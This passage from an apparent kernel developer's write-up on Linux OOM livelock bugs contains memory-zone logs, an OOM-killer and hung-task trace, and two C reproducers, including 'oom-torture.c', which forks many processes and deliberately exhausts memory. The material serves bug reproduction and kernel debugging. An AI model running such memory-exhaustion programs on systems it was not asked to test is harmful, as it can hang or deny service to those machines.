present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:12684kB shmem:8524kB slab_reclaimable:56808kB slab_unreclaimable:99804kB kernel_stack:58448kB pagetables:92552kB unstable:0kB bounce:0kB free_pcp:2004kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 291.349097] Node 0 DMA32: 4221*4kB (UME) 1971*8kB (UME) 436*16kB (UME) 141*32kB (UME) 8*64kB (UM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 44652kB [ 302.897985] Node 0 DMA32 free:28240kB min:5564kB low:6952kB high:8344kB active_anon:79344kB inactive_anon:8248kB active_file:1016568kB inactive_file:604696kB unevictable:0kB isolated(anon):0kB isolated(file):120kB present:2080640kB managed:2021100kB mlocked:0kB dirty:80kB writeback:0kB mapped:13004kB shmem:8520kB slab_reclaimable:52076kB slab_unreclaimable:64064kB kernel_stack:35168kB pagetables:48552kB unstable:0kB bounce:0kB free_pcp:1384kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 302.916334] Node 0 DMA32: 4304*4kB (UM) 1181*8kB (UME) 59*16kB (UME) 7*32kB (ME) 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 27832kB [ 311.014501] Node 0 DMA32 free:22820kB min:5564kB low:6952kB high:8344kB active_anon:56852kB inactive_anon:11976kB active_file:1142936kB inactive_file:582040kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:160kB writeback:0kB mapped:10796kB shmem:16640kB slab_reclaimable:48608kB slab_unreclaimable:41912kB kernel_stack:16560kB pagetables:30876kB unstable:0kB bounce:0kB free_pcp:948kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:128 all_unreclaimable? no [ 311.034251] Node 0 DMA32: 6*4kB (U) 2401*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 19232kB [ 314.293371] Node 0 DMA32 free:15244kB min:5564kB low:6952kB high:8344kB active_anon:82496kB inactive_anon:11976kB active_file:1110984kB inactive_file:467400kB unevictable:0kB isolated(anon):0kB isolated(file):88kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:9440kB shmem:16640kB slab_reclaimable:53684kB slab_unreclaimable:72536kB kernel_stack:40048kB pagetables:67672kB unstable:0kB bounce:0kB free_pcp:1076kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:12 all_unreclaimable? no [ 314.314336] Node 0 DMA32: 1180*4kB (UM) 1449*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 16312kB [ 322.774181] Node 0 DMA32 free:19780kB min:5564kB low:6952kB high:8344kB active_anon:68264kB inactive_anon:17816kB active_file:1155724kB inactive_file:470216kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:8kB writeback:0kB mapped:9744kB shmem:24708kB slab_reclaimable:52540kB slab_unreclaimable:63216kB kernel_stack:32464kB pagetables:51856kB unstable:0kB bounce:0kB free_pcp:1076kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 322.796256] Node 0 DMA32: 86*4kB (UME) 2474*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 20136kB [ 330.804341] Node 0 DMA32 free:22076kB min:5564kB low:6952kB high:8344kB active_anon:47616kB inactive_anon:17816kB active_file:1063272kB inactive_file:685848kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:216kB writeback:0kB mapped:9708kB shmem:24708kB slab_reclaimable:48536kB slab_unreclaimable:36844kB kernel_stack:12048kB pagetables:25992kB unstable:0kB bounce:0kB free_pcp:776kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 330.826190] Node 0 DMA32: 1637*4kB (UM) 1354*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 17380kB [ 332.828224] Node 0 DMA32 free:15544kB min:5564kB low:6952kB high:8344kB active_anon:63184kB inactive_anon:17784kB active_file:1215752kB inactive_file:468872kB unevictable:0kB isolated(anon):0kB isolated(file):68kB present:2080640kB managed:2021100kB mlocked:0kB dirty:312kB writeback:0kB mapped:9116kB shmem:24708kB slab_reclaimable:49912kB slab_unreclaimable:50068kB kernel_stack:21600kB pagetables:42384kB unstable:0kB bounce:0kB free_pcp:1364kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 332.846805] Node 0 DMA32: 4108*4kB (UME) 897*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 23608kB [ 341.054731] Node 0 DMA32 free:20512kB min:5564kB low:6952kB high:8344kB active_anon:76796kB inactive_anon:23792kB active_file:1053836kB inactive_file:618588kB unevictable:0kB isolated(anon):0kB isolated(file):96kB present:2080640kB managed:2021100kB mlocked:0kB dirty:1656kB writeback:0kB mapped:19768kB shmem:32784kB slab_reclaimable:49000kB slab_unreclaimable:47636kB kernel_stack:21664kB pagetables:37188kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 341.073722] Node 0 DMA32: 3309*4kB (UM) 1124*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 22228kB [ 360.075472] Node 0 DMA32 free:17856kB min:5564kB low:6952kB high:8344kB active_anon:117872kB inactive_anon:25588kB active_file:1022532kB inactive_file:466856kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:420kB writeback:0kB mapped:25300kB shmem:40976kB slab_reclaimable:57804kB slab_unreclaimable:79416kB kernel_stack:46784kB pagetables:78044kB unstable:0kB bounce:0kB free_pcp:1100kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 360.093794] Node 0 DMA32: 2719*4kB (UM) 97*8kB (UM) 14*16kB (UM) 37*32kB (UME) 27*64kB (UME) 3*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15172kB [ 368.853099] Node 0 DMA32 free:22524kB min:5564kB low:6952kB high:8344kB active_anon:79156kB inactive_anon:24876kB active_file:872972kB inactive_file:738900kB unevictable:0kB isolated(anon):0kB isolated(file):96kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:25708kB shmem:40976kB slab_reclaimable:50820kB slab_unreclaimable:62880kB kernel_stack:32048kB pagetables:49656kB unstable:0kB bounce:0kB free_pcp:524kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 368.871173] Node 0 DMA32: 5042*4kB (UM) 248*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 22152kB [ 379.261759] Node 0 DMA32 free:15888kB min:5564kB low:6952kB high:8344kB active_anon:89928kB inactive_anon:23780kB active_file:1295512kB inactive_file:358284kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:1608kB writeback:0kB mapped:25376kB shmem:40976kB slab_reclaimable:47972kB slab_unreclaimable:50848kB kernel_stack:22320kB pagetables:42360kB unstable:0kB bounce:0kB free_pcp:248kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 379.279344] Node 0 DMA32: 2994*4kB (ME) 503*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 16000kB [ 387.367409] Node 0 DMA32 free:15320kB min:5564kB low:6952kB high:8344kB active_anon:76364kB inactive_anon:28712kB active_file:1061180kB inactive_file:596956kB unevictable:0kB isolated(anon):0kB isolated(file):120kB present:2080640kB managed:2021100kB mlocked:0kB dirty:20kB writeback:0kB mapped:27700kB shmem:49168kB slab_reclaimable:51236kB slab_unreclaimable:51096kB kernel_stack:22912kB pagetables:40920kB unstable:0kB bounce:0kB free_pcp:700kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 387.385740] Node 0 DMA32: 3638*4kB (UM) 115*8kB (UM) 1*16kB (U) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15488kB [ 391.207543] Node 0 DMA32 free:15224kB min:5564kB low:6952kB high:8344kB active_anon:115956kB inactive_anon:28392kB active_file:1117532kB inactive_file:359656kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:29348kB shmem:49168kB slab_reclaimable:56028kB slab_unreclaimable:85168kB kernel_stack:48592kB pagetables:81620kB unstable:0kB bounce:0kB free_pcp:1124kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:356 all_unreclaimable? no [ 391.228084] Node 0 DMA32: 3374*4kB (UME) 221*8kB (M) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15264kB [ 395.663881] Node 0 DMA32 free:12820kB min:5564kB low:6952kB high:8344kB active_anon:98924kB inactive_anon:27520kB active_file:1105780kB inactive_file:494760kB unevictable:0kB isolated(anon):4kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:1412kB writeback:12kB mapped:29588kB shmem:49168kB slab_reclaimable:49836kB slab_unreclaimable:60524kB kernel_stack:32176kB pagetables:50356kB unstable:0kB bounce:0kB free_pcp:1500kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:388 all_unreclaimable? no [ 395.683137] Node 0 DMA32: 3794*4kB (ME) 0*8kB 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15176kB [ 399.871655] Node 0 DMA32 free:18432kB min:5564kB low:6952kB high:8344kB active_anon:99156kB inactive_anon:26780kB active_file:1150532kB inactive_file:408872kB unevictable:0kB isolated(anon):68kB isolated(file):80kB present:2080640kB managed:2021100kB mlocked:0kB dirty:3492kB writeback:0kB mapped:30924kB shmem:49168kB slab_reclaimable:54236kB slab_unreclaimable:68184kB kernel_stack:37392kB pagetables:63708kB unstable:0kB bounce:0kB free_pcp:784kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 399.890082] Node 0 DMA32: 4155*4kB (UME) 200*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 18220kB [ 408.447006] Node 0 DMA32 free:12684kB min:5564kB low:6952kB high:8344kB active_anon:74296kB inactive_anon:25960kB active_file:1086404kB inactive_file:605660kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:264kB writeback:0kB mapped:30604kB shmem:49168kB slab_reclaimable:50200kB slab_unreclaimable:45212kB kernel_stack:19184kB pagetables:34500kB unstable:0kB bounce:0kB free_pcp:740kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 408.465169] Node 0 DMA32: 2804*4kB (ME) 203*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 12840kB [ 416.426931] Node 0 DMA32 free:15396kB min:5564kB low:6952kB high:8344kB active_anon:98836kB inactive_anon:32120kB active_file:964808kB inactive_file:666224kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:33628kB shmem:57332kB slab_reclaimable:51048kB slab_unreclaimable:51824kB kernel_stack:23328kB pagetables:41896kB unstable:0kB bounce:0kB free_pcp:988kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 416.447247] Node 0 DMA32: 5158*4kB (UME) 68*8kB (M) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 21176kB [ 418.780159] Node 0 DMA32 free:8876kB min:5564kB low:6952kB high:8344kB active_anon:86544kB inactive_anon:31516kB active_file:965016kB inactive_file:654444kB unevictable:0kB isolated(anon):0kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:8408kB shmem:57332kB slab_reclaimable:48856kB slab_unreclaimable:61116kB kernel_stack:30224kB pagetables:48636kB unstable:0kB bounce:0kB free_pcp:980kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:260 all_unreclaimable? no [ 418.799643] Node 0 DMA32: 3093*4kB (UME) 1043*8kB (UME) 2*16kB (M) 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 20748kB [ 428.087913] Node 0 DMA32 free:22760kB min:5564kB low:6952kB high:8344kB active_anon:94544kB inactive_anon:38936kB active_file:1013576kB inactive_file:564976kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:0kB mapped:36096kB shmem:65376kB slab_reclaimable:52196kB slab_unreclaimable:60576kB kernel_stack:29888kB pagetables:56364kB unstable:0kB bounce:0kB free_pcp:852kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 428.109005] Node 0 DMA32: 2943*4kB (UME) 458*8kB (UME) 20*16kB (UME) 11*32kB (UME) 11*64kB (ME) 4*128kB (UME) 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 17324kB [ 439.014180] Node 0 DMA32 free:11232kB min:5564kB low:6952kB high:8344kB active_anon:82868kB inactive_anon:38872kB active_file:1189912kB inactive_file:439592kB unevictable:0kB isolated(anon):12kB isolated(file):40kB present:2080640kB managed:2021100kB mlocked:0kB dirty:0kB writeback:1152kB mapped:35948kB shmem:65376kB slab_reclaimable:51224kB slab_unreclaimable:56664kB kernel_stack:27696kB pagetables:43180kB unstable:0kB bounce:0kB free_pcp:380kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 439.032446] Node 0 DMA32: 2761*4kB (UM) 28*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 11268kB [ 441.731001] Node 0 DMA32 free:15056kB min:5564kB low:6952kB high:8344kB active_anon:90532kB inactive_anon:42716kB active_file:1204248kB inactive_file:377196kB unevictable:0kB isolated(anon):12kB isolated(file):116kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5552kB shmem:73568kB slab_reclaimable:52956kB slab_unreclaimable:68304kB kernel_stack:39936kB pagetables:47472kB unstable:0kB bounce:0kB free_pcp:624kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 441.731018] Node 0 DMA32: 3130*4kB (UM) 338*8kB (UM) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 15224kB [ 442.070851] Node 0 DMA32 free:8852kB min:5564kB low:6952kB high:8344kB active_anon:90412kB inactive_anon:42664kB active_file:1179304kB inactive_file:371316kB unevictable:0kB isolated(anon):108kB isolated(file):268kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5544kB shmem:73568kB slab_reclaimable:55136kB slab_unreclaimable:80080kB kernel_stack:55456kB pagetables:52692kB unstable:0kB bounce:0kB free_pcp:312kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:348 all_unreclaimable? no [ 442.070867] Node 0 DMA32: 590*4kB (ME) 827*8kB (ME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 8976kB [ 442.245192] Node 0 DMA32 free:10832kB min:5564kB low:6952kB high:8344kB active_anon:97756kB inactive_anon:42664kB active_file:1082048kB inactive_file:417012kB unevictable:0kB isolated(anon):108kB isolated(file):268kB present:2080640kB managed:2021100kB mlocked:0kB dirty:4kB writeback:0kB mapped:5248kB shmem:73568kB slab_reclaimable:62816kB slab_unreclaimable:88964kB kernel_stack:61408kB pagetables:62908kB unstable:0kB bounce:0kB free_pcp:696kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? no [ 442.245208] Node 0 DMA32: 1902*4kB (UME) 410*8kB (UME) 0*16kB 0*32kB 0*64kB 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 0*4096kB = 10888kB ---------- Example output end ----------
Since this problem was discovered, we concluded that we need more testings, and the modification was not sent to initially targeted Linux 4.6. Then, a lot of testings are done, and we concluded that we can obtain reasonable results, and the modification was sent to Linux 4.7.
Currently we are in the step whether it works well without side effects. But since nobody actively tests behavior under memory pressure, I can't deny the possibility of finding unexpected side effects after this change is included into enterprise Linux distributions.
Incidentally, a few hours before the modification was merged to linux.git, Oleg Nesterov reported a problem that The system enters into OOM livelock situation due to retry logic by zone_reclaimable(). The problem should be already solved by the modification, but I was surprised to see the reproducer Oleg posted.
Mercy! Oleg reported that the problem can be reproduced by repeatedly running the reproducer shown below on a system with one CPU. It is a contrast to my multi-threaded reproducers which I developed with trial and error in order to intentionally reproduce almost OOM situation.
---------- oleg's-test.c ---------- #include <stdlib.h> #include <string.h> int main(void) { for (;;) { void *p = malloc(1024 * 1024); memset(p, 0, 1024 * 1024); } } ---------- oleg's-test.c ----------
···we can't predict in which situations a problem caused by memory management pops up.
The OOM detection rework got long discussion as with the OOM reaper, but that is too difficult for me to understand. But I introduce one unresolved problem which was discovered while testing the OOM detection rework.
Linux 2.6.32 and later includes commit 35cd78156c499ef8 ("vmscan: throttle direct reclaim when too many pages are isolated already") in order to avoid premature invocation of the OOM killer. But that patch did not suppose a situation where kswapd kernel thread which reclaims memory asynchronously is blocked at locks which are acquired while reclaiming memory. As a result, an infinite loop where all threads doing memory allocation requests wait for kswapd forever, and the system enters into OOM livelock situation without invoking the OOM killer.
---------- oom-torture.c ---------- #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <signal.h> #include <poll.h> static char use_delay = 0; static void sigcld_handler(int unused) { use_delay = 1; } int main(int argc, char *argv[]) { static char buffer[4096] = { }; char *buf = NULL; unsigned long size; int i; signal(SIGCLD, sigcld_handler); for (i = 0; i < 1024; i++) { if (fork() == 0) { int fd = open("/proc/self/oom_score_adj", O_WRONLY); write(fd, "1000", 4); close(fd); sleep(1); if (!i) pause(); snprintf(buffer, sizeof(buffer), "/tmp/file.%u", getpid()); fd = open(buffer, O_WRONLY | O_CREAT | O_APPEND, 0600); while (write(fd, buffer, sizeof(buffer)) == sizeof(buffer)) { poll(NULL, 0, 10); fsync(fd); } _exit(0); } } for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) { char *cp = realloc(buf, size); if (!cp) { size >>= 1; break; } buf = cp; } sleep(2); /* Will cause OOM due to overcommit */ for (i = 0; i < size; i += 4096) { buf[i] = 0; if (use_delay) /* Give children a chance to write(). */ poll(NULL, 0, 10); } pause(); return 0; } ---------- oom-torture.c ----------
---------- Example output start ---------- [ 1096.700789] systemd invoked oom-killer: gfp_mask=0x24201ca(GFP_HIGHUSER_MOVABLE|__GFP_COLD), order=0, oom_score_adj=0 [ 1096.708751] systemd cpuset=/ mems_allowed=0 [ 1096.712519] CPU: 2 PID: 1 Comm: systemd Not tainted 4.7.0-rc7+ #55 [ 1096.717463] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 1096.725553] 0000000000000286 0000000006e33503 ffff88003faef998 ffffffff812d727d [ 1096.731302] 0000000000000000 ffff88003faefbb0 ffff88003faefa38 ffffffff811c5944 [ 1096.736956] 0000000000000206 ffffffff8182b870 ffff88003faef9d8 ffffffff810c0ef9 [ 1096.742600] Call Trace: [ 1096.744916] [<ffffffff812d727d>] dump_stack+0x85/0xc8 [ 1096.749276] [<ffffffff811c5944>] dump_header+0x5b/0x3a8 [ 1096.753708] [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0 [ 1096.758659] [<ffffffff810c0fcd>] ? trace_hardirqs_on+0xd/0x10 [ 1096.763176] [<ffffffff81626e45>] ? _raw_spin_unlock_irqrestore+0x45/0x80 [ 1096.768275] [<ffffffff8114eda8>] oom_kill_process+0x388/0x520 [ 1096.772759] [<ffffffff8114f51f>] out_of_memory+0x58f/0x5e0 [ 1096.777101] [<ffffffff8114f180>] ? out_of_memory+0x1f0/0x5e0 [ 1096.781511] [<ffffffff8115447f>] __alloc_pages_nodemask+0xeff/0xf70 [ 1096.786612] [<ffffffff8119e8c6>] alloc_pages_current+0x96/0x1b0 [ 1096.791221] [<ffffffff8114933d>] __page_cache_alloc+0x12d/0x160 [ 1096.796023] [<ffffffff8114cf5f>] filemap_fault+0x45f/0x670 [ 1096.800329] [<ffffffff8114ce30>] ? filemap_fault+0x330/0x670 [ 1096.804672] [<ffffffffa0245be9>] xfs_filemap_fault+0x39/0x60 [xfs] [ 1096.809332] [<ffffffff81176e71>] __do_fault+0x71/0x140 [ 1096.813331] [<ffffffff8117d53c>] handle_mm_fault+0x12ec/0x1f30 [ 1096.817750] [<ffffffff8105c7b2>] ? __do_page_fault+0x102/0x560 [ 1096.822166] [<ffffffff8105c840>] __do_page_fault+0x190/0x560 [ 1096.826542] [<ffffffff8105cc40>] do_page_fault+0x30/0x80 [ 1096.830551] [<ffffffff81629278>] page_fault+0x28/0x30 [ 1096.835739] Mem-Info: [ 1096.838525] active_anon:197561 inactive_anon:2919 isolated_anon:0 [ 1096.838525] active_file:284 inactive_file:479 isolated_file:32 [ 1096.838525] unevictable:0 dirty:0 writeback:126 unstable:0 [ 1096.838525] slab_reclaimable:1717 slab_unreclaimable:11222 [ 1096.838525] mapped:360 shmem:3239 pagetables:5654 bounce:0 [ 1096.838525] free:12151 free_pcp:319 free_cma:0 [ 1096.867008] Node 0 DMA free:4472kB min:732kB low:912kB high:1092kB active_anon:8600kB inactive_anon:0kB active_file:44kB inactive_file:44kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:8kB mapped:44kB shmem:8kB slab_reclaimable:148kB slab_unreclaimable:796kB kernel_stack:432kB pagetables:524kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:568 all_unreclaimable? yes [ 1096.904546] lowmem_reserve[]: 0 936 936 936 [ 1096.909808] Node 0 DMA32 free:45364kB min:44320kB low:55400kB high:66480kB active_anon:781560kB inactive_anon:11676kB active_file:1152kB inactive_file:1196kB unevictable:0kB isolated(anon):0kB isolated(file):256kB present:1032064kB managed:981068kB mlocked:0kB dirty:0kB writeback:496kB mapped:1396kB shmem:12948kB slab_reclaimable:6716kB slab_unreclaimable:43992kB kernel_stack:20384kB pagetables:22092kB unstable:0kB bounce:0kB free_pcp:716kB local_pcp:124kB free_cma:0kB writeback_tmp:0kB pages_scanned:3852 all_unreclaimable? no [ 1096.945857] lowmem_reserve[]: 0 0 0 0 [ 1096.950262] Node 0 DMA: 38*4kB (UM) 26*8kB (UM) 11*16kB (UM) 11*32kB (UM) 2*64kB (UM) 3*128kB (UM) 4*256kB (UM) 2*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 4472kB [ 1096.963656] Node 0 DMA32: 1333*4kB (UME) 1032*8kB (UME) 670*16kB (UME) 308*32kB (UME) 111*64kB (UE) 24*128kB (UME) 4*256kB (UM) 0*512kB 0*1024kB 0*2048kB 0*4096kB = 45364kB [ 1096.976258] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB [ 1096.983860] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 1096.994897] 3918 total pagecache pages [ 1096.999165] 0 pages in swap cache [ 1097.002688] Swap cache stats: add 0, delete 0, find 0/0 [ 1097.007309] Free swap = 0kB [ 1097.010194] Total swap = 0kB [ 1097.012787] 262013 pages RAM [ 1097.015345] 0 pages HighMem/MovableOnly [ 1097.020898] 12770 pages reserved [ 1097.024751] 0 pages cma reserved [ 1097.027858] 0 pages hwpoisoned [ 1097.031473] Out of memory: Kill process 4206 (oom-torture) score 999 or sacrifice child [ 1097.037825] Killed process 4206 (oom-torture) total-vm:4176kB, anon-rss:84kB, file-rss:0kB, shmem-rss:0kB [ 1097.045884] oom_reaper: reaped process 4206 (oom-torture), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB [ 1200.867049] INFO: task oom-torture:3970 blocked for more than 120 seconds. [ 1200.890695] Not tainted 4.7.0-rc7+ #55 [ 1200.898627] "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. [ 1200.913371] oom-torture D ffff88003bcff428 0 3970 3652 0x00000080 [ 1200.926432] ffff88003bcff428 ffff88002a996100 ffff88003fba4080 ffff88002a996100 [ 1200.939946] ffff88003bd00000 ffff880037de7070 ffff88002a996100 ffff880035d00000 [ 1200.950865] 0000000000000000 ffff88003bcff440 ffffffff81621dea 7fffffffffffffff [ 1200.957640] Call Trace: [ 1200.961125] [<ffffffff81621dea>] schedule+0x3a/0x90 [ 1200.965512] [<ffffffff816266df>] schedule_timeout+0x17f/0x1c0 [ 1200.970311] [<ffffffff810c0dd6>] ? mark_held_locks+0x66/0x90 [ 1200.975693] [<ffffffff81626ea7>] ? _raw_spin_unlock_irq+0x27/0x60 [ 1200.980603] [<ffffffff810c0ef9>] ? trace_hardirqs_on_caller+0xf9/0x1c0 [ 1200.985516] [<ffffffff816253fb>] __down+0x71/0xb8 [ 1200.989693] [<ffffffff81626c86>] ? _raw_spin_lock_irqsave+0x56/0x70 [ 1200.994497] [<ffffffff810bcf1c>] down+0x3c/0x50 [ 1200.998181] [<ffffffffa02425e1>] xfs_buf_lock+0x21/0x50 [xfs] [ 1201.002629] [<ffffffffa02427c5>] _xfs_buf_find+0x1b5/0x2e0 [xfs] [ 1201.007199] [<ffffffffa0242915>] xfs_buf_get_map+0x25/0x160 [xfs] [ 1201.011795] [<ffffffffa0242ee9>] xfs_buf_read_map+0x29/0xe0 [xfs] [ 1201.016359] [<ffffffffa026d837>] xfs_trans_read_buf_map+0x97/0x1a0 [xfs] [ 1201.021284] [<ffffffffa020ad95>] xfs_read_agf+0x75/0xb0 [xfs] [ 1201.025590] [<ffffffffa020adf6>] xfs_alloc_read_agf+0x26/0xd0 [xfs] [ 1201.030407] [<ffffffffa020b1c5>] xfs_alloc_fix_freelist+0x325/0x3e0 [xfs] [ 1201.035343] [<ffffffffa0239752>] ? xfs_perag_get+0x82/0x110 [xfs] [ 1201.039829] [<ffffffff812dd76e>] ? __radix_tree_lookup+0x6e/0xd0 [ 1201.044235] [<ffffffffa020b47e>] xfs_alloc_vextent+0x19e/0x480 [xfs] [ 1201.048841] [<ffffffffa02190cf>] xfs_bmap_btalloc+0x3bf/0x710 [xfs] [ 1201.053380] [<ffffffffa0219429>] xfs_bmap_alloc+0x9/0x10 [xfs] [ 1201.057632] [<ffffffffa0219e1a>] xfs_bmapi_write+0x47a/0xa10 [xfs] [ 1201.062077] [<ffffffffa024f3fd>] xfs_iomap_write_allocate+0x16d/0x350 [xfs] [ 1201.066970] [<ffffffffa023c4ed>] xfs_map_blocks+0x13d/0x150 [xfs] [ 1201.071307] [<ffffffffa023d468>] xfs_do_writepage+0x158/0x540 [xfs] [ 1201.075729] [<ffffffff81158326>] write_cache_pages+0x1f6/0x490 [ 1201.080437] [<ffffffffa023d310>] ? xfs_aops_discard_page+0x140/0x140 [xfs] [ 1201.085510] [<ffffffff810c1a9b>] ? __lock_acquire+0x75b/0x1a30 [ 1201.090299] [<ffffffffa023d136>] xfs_vm_writepages+0x66/0xa0 [xfs] [ 1201.094736] [<ffffffff811594ac>] do_writepages+0x1c/0x30 [ 1201.098589] [<ffffffff8114bab1>] __filemap_fdatawrite_range+0xc1/0x100 [ 1201.103563] [<ffffffff8114bbc8>] filemap_write_and_wait_range+0x28/0x60 [ 1201.108244] [<ffffffffa02458f4>] xfs_file_fsync+0x44/0x180 [xfs] [ 1201.112542] [<ffffffff811ff2b8>] vfs_fsync_range+0x38/0xa0 [ 1201.116499] [<ffffffff811eb68a>] ? __fget_light+0x6a/0x90 [ 1201.120399] [<ffffffff811ff378>] do_fsync+0x38/0x60 [ 1201.123990] [<ffffffff811ff5fb>] SyS_fsync+0xb/0x10 [ 1201.127842] [<ffffffff81003642>] do_syscall_64+0x62/0x190 [ 1201.131751] [<ffffffff816277ff>] entry_SYSCALL64_slow_path+0x25/0x25 [ 1201.136237] 2 locks held by oom-torture/3970: [ 1201.141000] #0: (sb_internal){.+.+.?}, at: [<ffffffff811ce35c>] __sb_start_write+0xcc/0xe0 [ 1201.147852] #1: (&xfs_nondir_ilock_class){++++--}, at: [<ffffffffa0251caf>] xfs_ilock+0x7f/0xe0 